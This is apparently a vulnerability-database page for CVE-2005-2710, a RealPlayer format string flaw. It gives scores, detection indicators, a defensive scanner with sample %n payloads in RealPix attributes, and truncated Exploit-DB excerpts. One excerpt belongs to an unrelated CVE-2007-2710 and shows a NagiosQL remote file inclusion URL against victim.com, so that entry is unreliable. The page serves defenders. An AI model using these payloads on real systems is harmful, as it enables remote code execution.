CVE-2005-2710
Published 2005-09-27
CVE-2005-2710: Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat…
Priority: P3 · 39 · medium · CVSS 2.0 score 5.1
CVSS vector: AV:N/AC:H/Au:N/C:P/I:P/A:P
Exploit available
EPSS: 13.18% (95.9th percentile)
Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat attribute in a RealPix (.rp) or RealText (.rt) file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realnetworks | realplayer | — | — |
Detection & IOCs (extracted from sources)
- The exploit triggers the format string vulnerability via the 'image' handle or 'timeformat' attribute inside a crafted .rp (RealPix) or .rt (RealText) file delivered remotely (e.g., via a web link). Monitor RealPlayer/HelixPlayer processes opening .rp or .rt files from remote/untrusted sources.
- The exploit spawns a bind shell on TCP port 4444 using embedded shellcode. Detect outbound or inbound connections to/from port 4444 originating from realplay or realplay.bin processes.
- Shellcode is heap-mapped in the address range 0x0822****–0x082f**** during exploitation. Memory forensics or debugger-based detection can look for executable shellcode in this heap region within the RealPlayer process.
- The exploit uses a format string payload embedded in the 'timeformat' XML attribute of the .rp file (fprintf with %N$n-style specifiers). Inspect .rp/.rt files for format string tokens (e.g., %n, %x, %hn) inside XML attributes.
- The exploit uses /bin/nc (netcat) to connect back to the spawned shell. Detect child processes of realplay/realplay.bin spawning /bin/nc or /bin/sh.
- The exploit's EBP-overwrite trampoline technique relies on the crafted .rp filename being stored in an environment variable at a predictable stack location. The author notes this is not stable: 'this is not a stable method as the user can freely manipulate their environment'.
- The POC was tested specifically on Debian 3.1 with RealPlayer installed at /usr/local/RealPlayer. Different installation paths or distributions may require adjustments to VULN path and stack pop count (STACKPOP=148).
- The shellcode heap mapping range (0x0822****–0x082f****) is specific to the tested environment; ASLR or differing heap layouts on other systems will shift this range.
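The file-inspection check in the list above, as an added example that is not part of the original record or of any vendor tooling: it parses a RealPix/RealText file, walks every XML attribute (including `timeformat` and the `image` `handle`), and flags printf-style conversion tokens such as `%n`, `%hn`, `%N$n` and `%x`. The sample .rp/.rt snippets are constructed for illustration; real files will differ.

```python
import re
import xml.etree.ElementTree as ET

# printf-style conversion: optional positional "N$", flags, width, precision,
# length modifier, then a conversion character. %n/%hn are the write
# primitives; %x/%p/%s read the stack, so all of them are flagged for review.
FMT_SPEC = re.compile(r"%(?:\d+\$)?[-+ 0#]*\d*(?:\.\d+)?(?:hh|h|ll|l)?[nxXpsdiuc]")
# Fallback for RealText/SGML-style markup that is not well-formed XML.
ATTR_PAIR = re.compile(r'([A-Za-z_:][\w:.-]*)\s*=\s*"([^"]*)"')

# Constructed samples (not taken from the advisory or the PoC).
BENIGN_RP = (
    '<imfl>'
    '<head timeformat="dd:hh:mm:ss.xyz" duration="10" width="256" height="256"/>'
    '<image handle="1" name="a.jpg"/>'
    '</imfl>'
)
MALICIOUS_RP = (
    '<imfl>'
    '<head timeformat="%13$n" duration="10"/>'
    '<image handle="%x%x%hn" name="a.jpg"/>'
    '</imfl>'
)
MALFORMED_RT = '<window type="generic" duration="%4$n"><font size="2">'


def scan_attributes(pairs):
    """Return (tag, attr, specifiers) for every attribute holding format tokens."""
    findings = []
    for tag, attr, value in pairs:
        specs = FMT_SPEC.findall(value)
        if specs:
            findings.append((tag, attr, specs))
    return findings


def scan_realpix(text):
    """Scan .rp/.rt markup; fall back to a regex over attribute pairs if the
    file is not well-formed XML, so a malformed file cannot evade the check."""
    try:
        root = ET.fromstring(text)
        pairs = [(el.tag, k, v) for el in root.iter() for k, v in el.attrib.items()]
    except ET.ParseError:
        pairs = [("?", k, v) for k, v in ATTR_PAIR.findall(text)]
    return scan_attributes(pairs)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_RP), ("malicious", MALICIOUS_RP), ("malformed", MALFORMED_RT)):
        print(label, scan_realpix(doc))
```

Legitimate `timeformat` values such as `dd:hh:mm:ss.xyz` contain no `%`, so any conversion token in these attributes is worth quarantining the file for.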
CVSS provenance
- nvd (v2.0): 5.1 MEDIUM, AV:N/AC:H/Au:N/C:P/I:P/A:P
- vendor_redhat: 5.1 MEDIUM
Red Hat (vendor_redhat · 2005-09-26 · CVSS 5.1)
CVE-2005-2710 [MEDIUM] security flaw
Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat attribute in a RealPix (.rp) or RealText (.rt) file.
GHSA (ghsa_unreviewed · 2022-05-01)
CVE-2005-2710 [MEDIUM] GHSA-xq2m-jgm3-gpjw
Format string vulnerability in Real HelixPlayer and RealPlayer 10 allows remote attackers to execute arbitrary code via the (1) image handle or (2) timeformat attribute in a RealPix (.rp) or RealText (.rt) file.
No detection rules found.
Exploit-DB (exploitdb · 2007-05-14)
CVE-2007-2710 NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
---
#NagiosQL Remote file inclusion
#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz
#Thanks str0ke
#Exploit :
#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?
#Discovered by ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com
# milw0rm.com [2007-05-14]
Exploit-DB (exploitdb · 2005-09-26)
CVE-2005-2710 RealPlayer/Helix Player (Linux) - Remote Format String
---
/*
$ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: September 26th 2005
3: Bug Impact Rate: Hi
4: Bug Scope Rate: Remote
$ This advisory and/or proof of concept code must not be used for commercial gain.
UNIX RealPlayer && Helix Player
http://real.com
http://helixcommunity.org
"The Helix Player is the Helix Community's open source media player for consumers. It is being developed
to have a rich and usable graphical interface and support a variety of open media formats like Ogg Vorbis,
Theora etc.
The RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several
non-open source compone
References
- http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=168078
- http://marc.info/?l=bugtraq&m=112785544325326&w=2
- http://marc.info/?l=full-disclosure&m=112775929608219&w=2
- http://secunia.com/advisories/16954
- http://secunia.com/advisories/16961
- http://secunia.com/advisories/16981
- http://secunia.com/advisories/17116
- http://secunia.com/advisories/17127
- http://securityreason.com/securityalert/27
- http://securityreason.com/securityalert/41
- http://www.debian.org/security/2005/dsa-826
- http://www.gentoo.org/security/en/glsa/glsa-200510-07.xml
- http://www.idefense.com/application/poi/display?id=311&type=vulnerabilities
- http://www.kb.cert.org/vuls/id/361181
- http://www.novell.com/linux/security/advisories/2005_59_RealPlayer.html
- http://www.open-security.org/advisories/13
- http://www.redhat.com/support/errata/RHSA-2005-762.html
- http://www.redhat.com/support/errata/RHSA-2005-788.html
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11015